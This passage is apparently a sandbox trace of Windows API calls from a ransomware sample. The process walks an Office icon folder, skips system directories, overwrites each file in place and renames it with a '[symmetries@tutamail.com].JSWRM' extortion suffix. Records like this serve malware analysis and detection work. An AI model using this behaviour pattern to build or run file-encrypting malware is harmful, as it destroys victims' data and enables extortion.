returned 5 [0131.492] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0131.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0131.492] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\ALERT.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\alert.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0131.493] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=2606) returned 1 [0131.493] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.493] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa20) returned 0x20c6c0 [0131.494] ReadFile (in: hFile=0x314, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0xa20, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e534*=0xa20, lpOverlapped=0x0) returned 1 [0131.495] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.495] WriteFile (in: hFile=0x314, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0xa20, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e530*=0xa20, lpOverlapped=0x0) returned 1 [0131.495] CloseHandle (hObject=0x314) returned 1 [0131.495] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0131.496] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0131.496] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0131.496] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0131.496] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0131.496] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\ALERT.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\alert.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\ALERT.ICO.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\alert.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0131.497] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6165f55, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6165f55, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6165f55, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xb2e, dwReserved0=0x60002, dwReserved1=0x225316, cFileName="CHEVRON.ICO", cAlternateFileName="")) returned 1 [0131.497] lstrcmpiW (lpString1="CHEVRON.ICO", lpString2=".") returned 1 [0131.497] lstrcmpiW (lpString1="CHEVRON.ICO", lpString2="..") returned 1 [0131.497] lstrcmpiW (lpString1="CHEVRON.ICO", lpString2="...") returned 1 [0131.497] lstrcmpiW (lpString1="CHEVRON.ICO", lpString2="windows") returned -1 [0131.497] lstrcmpiW (lpString1="CHEVRON.ICO", lpString2="recovery") returned -1 [0131.497] lstrcmpiW (lpString1="CHEVRON.ICO", lpString2="perflogs") returned -1 [0131.497] lstrcmpiW (lpString1="CHEVRON.ICO", lpString2="documents and settings") returned -1 [0131.497] lstrcmpiW (lpString1="CHEVRON.ICO", lpString2="$RECYCLE.BIN") returned 1 [0131.497] lstrcmpiW (lpString1="CHEVRON.ICO", lpString2="system volume information") returned -1 [0131.497] lstrcmpiW (lpString1="CHEVRON.ICO", lpString2="msocache") returned -1 [0131.497] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CHEVRON.ICO", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0131.497] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CHEVRON.ICO", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CHEVRON.ICO", lpUsedDefaultChar=0x0) returned 11 [0131.497] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CHEVRON.ICO", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0131.497] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CHEVRON.ICO", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CHEVRON.ICO", lpUsedDefaultChar=0x0) returned 11 [0131.497] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0131.497] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0131.497] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\CHEVRON.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\chevron.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0131.498] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=2862) returned 1 [0131.498] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.499] ReadFile (in: hFile=0x314, lpBuffer=0x278330, nNumberOfBytesToRead=0xb20, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesRead=0x345e534*=0xb20, lpOverlapped=0x0) returned 1 [0131.509] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.509] WriteFile (in: hFile=0x314, lpBuffer=0x278330*, nNumberOfBytesToWrite=0xb20, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesWritten=0x345e530*=0xb20, lpOverlapped=0x0) returned 1 [0131.509] CloseHandle (hObject=0x314) returned 1 [0131.509] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\CHEVRON.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\chevron.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\CHEVRON.ICO.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\chevron.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0131.511] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfc34bb5b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc34bb5b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc34bb5b, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xa2e, dwReserved0=0x60002, dwReserved1=0x225316, cFileName="COMPUTER.ICO", cAlternateFileName="")) returned 1 [0131.511] lstrcmpiW (lpString1="COMPUTER.ICO", lpString2=".") returned 1 [0131.511] lstrcmpiW (lpString1="COMPUTER.ICO", lpString2="..") returned 1 [0131.511] lstrcmpiW (lpString1="COMPUTER.ICO", lpString2="...") returned 1 [0131.511] lstrcmpiW (lpString1="COMPUTER.ICO", lpString2="windows") returned -1 [0131.511] lstrcmpiW (lpString1="COMPUTER.ICO", lpString2="recovery") returned -1 [0131.511] lstrcmpiW (lpString1="COMPUTER.ICO", lpString2="perflogs") returned -1 [0131.511] lstrcmpiW (lpString1="COMPUTER.ICO", lpString2="documents and settings") returned -1 [0131.511] lstrcmpiW (lpString1="COMPUTER.ICO", lpString2="$RECYCLE.BIN") returned 1 [0131.511] lstrcmpiW (lpString1="COMPUTER.ICO", lpString2="system volume information") returned -1 [0131.511] lstrcmpiW (lpString1="COMPUTER.ICO", lpString2="msocache") returned -1 [0131.511] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="COMPUTER.ICO", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0131.511] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="COMPUTER.ICO", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="COMPUTER.ICO", lpUsedDefaultChar=0x0) returned 12 [0131.511] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="COMPUTER.ICO", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0131.511] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="COMPUTER.ICO", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="COMPUTER.ICO", lpUsedDefaultChar=0x0) returned 12 [0131.512] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0131.512] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0131.512] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\COMPUTER.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\computer.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0131.512] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=2606) returned 1 [0131.512] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.513] ReadFile (in: hFile=0x314, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0xa20, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e534*=0xa20, lpOverlapped=0x0) returned 1 [0131.544] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.544] WriteFile (in: hFile=0x314, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0xa20, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e530*=0xa20, lpOverlapped=0x0) returned 1 [0131.545] CloseHandle (hObject=0x314) returned 1 [0131.545] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\COMPUTER.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\computer.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\COMPUTER.ICO.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\computer.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0131.546] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfbdc8437, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfbdc8437, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfbdee689, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xea6, dwReserved0=0x60002, dwReserved1=0x225316, cFileName="ContactSelector.ico", cAlternateFileName="CONTAC~1.ICO")) returned 1 [0131.546] lstrcmpiW (lpString1="ContactSelector.ico", lpString2=".") returned 1 [0131.546] lstrcmpiW (lpString1="ContactSelector.ico", lpString2="..") returned 1 [0131.546] lstrcmpiW (lpString1="ContactSelector.ico", lpString2="...") returned 1 [0131.546] lstrcmpiW (lpString1="ContactSelector.ico", lpString2="windows") returned -1 [0131.546] lstrcmpiW (lpString1="ContactSelector.ico", lpString2="recovery") returned -1 [0131.546] lstrcmpiW (lpString1="ContactSelector.ico", lpString2="perflogs") returned -1 [0131.546] lstrcmpiW (lpString1="ContactSelector.ico", lpString2="documents and settings") returned -1 [0131.546] lstrcmpiW (lpString1="ContactSelector.ico", lpString2="$RECYCLE.BIN") returned 1 [0131.546] lstrcmpiW (lpString1="ContactSelector.ico", lpString2="system volume information") returned -1 [0131.546] lstrcmpiW (lpString1="ContactSelector.ico", lpString2="msocache") returned -1 [0131.547] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ContactSelector.ico", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0131.547] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ContactSelector.ico", cchWideChar=19, lpMultiByteStr=0x241038, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ContactSelector.ico", lpUsedDefaultChar=0x0) returned 19 [0131.547] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ContactSelector.ico", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0131.547] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ContactSelector.ico", cchWideChar=19, lpMultiByteStr=0x2410d8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ContactSelector.ico", lpUsedDefaultChar=0x0) returned 19 [0131.547] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0131.547] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0131.547] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\ContactSelector.ico" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\contactselector.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0131.548] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=3750) returned 1 [0131.548] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.548] ReadFile (in: hFile=0x314, lpBuffer=0x278330, nNumberOfBytesToRead=0xea0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesRead=0x345e534*=0xea0, lpOverlapped=0x0) returned 1 [0131.550] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.550] WriteFile (in: hFile=0x314, lpBuffer=0x278330*, nNumberOfBytesToWrite=0xea0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesWritten=0x345e530*=0xea0, lpOverlapped=0x0) returned 1 [0131.550] CloseHandle (hObject=0x314) returned 1 [0131.550] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\ContactSelector.ico" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\contactselector.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\ContactSelector.ico.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\contactselector.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0131.552] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x22a9f7a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x22a9f7a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x22d01df, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x294dd, dwReserved0=0x60002, dwReserved1=0x225316, cFileName="GWE.ICO", cAlternateFileName="")) returned 1 [0131.552] lstrcmpiW (lpString1="GWE.ICO", lpString2=".") returned 1 [0131.552] lstrcmpiW (lpString1="GWE.ICO", lpString2="..") returned 1 [0131.552] lstrcmpiW (lpString1="GWE.ICO", lpString2="...") returned 1 [0131.552] lstrcmpiW (lpString1="GWE.ICO", lpString2="windows") returned -1 [0131.552] lstrcmpiW (lpString1="GWE.ICO", lpString2="recovery") returned -1 [0131.552] lstrcmpiW (lpString1="GWE.ICO", lpString2="perflogs") returned -1 [0131.552] lstrcmpiW (lpString1="GWE.ICO", lpString2="documents and settings") returned 1 [0131.552] lstrcmpiW (lpString1="GWE.ICO", lpString2="$RECYCLE.BIN") returned 1 [0131.552] lstrcmpiW (lpString1="GWE.ICO", lpString2="system volume information") returned -1 [0131.552] lstrcmpiW (lpString1="GWE.ICO", lpString2="msocache") returned -1 [0131.552] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GWE.ICO", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0131.552] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GWE.ICO", cchWideChar=7, lpMultiByteStr=0x345e870, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GWE.ICO", lpUsedDefaultChar=0x0) returned 7 [0131.552] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GWE.ICO", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0131.552] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GWE.ICO", cchWideChar=7, lpMultiByteStr=0x345e840, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GWE.ICO", lpUsedDefaultChar=0x0) returned 7 [0131.552] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0131.552] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0131.552] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\GWE.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\gwe.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0131.553] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=169181) returned 1 [0131.553] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.553] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x27100, lpOverlapped=0x0) returned 1 [0131.715] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.715] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x27100, lpOverlapped=0x0) returned 1 [0131.716] CloseHandle (hObject=0x314) returned 1 [0131.716] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\GWE.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\gwe.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\GWE.ICO.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\gwe.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0131.719] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf7b9ee02, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf7b9ee02, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf7bc5054, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x6b6, dwReserved0=0x60002, dwReserved1=0x225316, cFileName="INCOMING.ICO", cAlternateFileName="")) returned 1 [0131.719] lstrcmpiW (lpString1="INCOMING.ICO", lpString2=".") returned 1 [0131.719] lstrcmpiW (lpString1="INCOMING.ICO", lpString2="..") returned 1 [0131.719] lstrcmpiW (lpString1="INCOMING.ICO", lpString2="...") returned 1 [0131.719] lstrcmpiW (lpString1="INCOMING.ICO", lpString2="windows") returned -1 [0131.719] lstrcmpiW (lpString1="INCOMING.ICO", lpString2="recovery") returned -1 [0131.719] lstrcmpiW (lpString1="INCOMING.ICO", lpString2="perflogs") returned -1 [0131.719] lstrcmpiW (lpString1="INCOMING.ICO", lpString2="documents and settings") returned 1 [0131.719] lstrcmpiW (lpString1="INCOMING.ICO", lpString2="$RECYCLE.BIN") returned 1 [0131.719] lstrcmpiW (lpString1="INCOMING.ICO", lpString2="system volume information") returned -1 [0131.719] lstrcmpiW (lpString1="INCOMING.ICO", lpString2="msocache") returned -1 [0131.719] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="INCOMING.ICO", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0131.719] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="INCOMING.ICO", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="INCOMING.ICO", lpUsedDefaultChar=0x0) returned 12 [0131.719] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="INCOMING.ICO", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0131.719] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="INCOMING.ICO", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="INCOMING.ICO", lpUsedDefaultChar=0x0) returned 12 [0131.719] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0131.719] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0131.719] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\INCOMING.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\incoming.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0131.721] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=1718) returned 1 [0131.721] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: 